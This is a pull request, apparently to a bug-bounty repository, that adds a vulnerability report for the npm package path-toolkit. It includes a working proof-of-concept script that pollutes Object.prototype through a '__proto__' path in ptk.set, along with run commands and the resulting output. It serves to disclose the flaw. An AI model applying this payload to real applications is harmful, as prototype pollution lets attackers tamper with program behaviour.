### PR TITLE
Prototype Pollution in path-toolkit

### DIFF
--- a/bounties/npm/path-toolkit/1/README.md
+++ b/bounties/npm/path-toolkit/1/README.md
@@ -1,0 +1,31 @@
+# Description
+
+`path-toolkit` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```
+// poc.js
+var pathToolkit = require("path-toolkit")
+var ptk = new pathToolkit();
+var obj = {}
+console.log("Before : " + {}.polluted);
+ptk.set(obj,"__proto__.polluted","Yes! Its Polluted");
+console.log("After : " + {}.polluted);
+```
+
+
+2. Execute the following commands in terminal:
+
+```
+npm i path-toolkit # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```


### PR DESCRIPTION
`path-toolkit` is vulnerable to `Prototype Pollution`.